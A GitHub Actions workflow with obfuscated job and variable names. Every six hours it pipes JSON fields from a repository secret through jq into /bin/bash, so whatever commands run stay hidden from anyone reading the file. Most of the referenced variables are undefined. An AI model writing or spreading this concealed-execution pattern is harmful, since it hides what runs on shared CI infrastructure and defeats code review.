name: lujingxi3456
on:
  workflow_dispatch:
  schedule:
    - cron: '49 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lujingxi3456
        env:
          qyaln82914: ${{ secrets.qyaln82914 }}
        run: |
          echo $qyaln82914 | jq -r .xe345 | /bin/bash
          echo $as4 | jq -r .q71 | /bin/bash
          echo $yny093 | jq -r .vi4 | /bin/bash
          echo $uxzg6653 | jq -r .mgf17373 | /bin/bash
          echo $kdyja7 | jq -r .xeqxi74 | /bin/bash
          echo $yaf33692 | jq -r .speu261 | /bin/bash
          echo $bfg85 | jq -r .zp7127 | /bin/bash
          echo $yjlvo7350 | jq -r .b9459 | /bin/bash

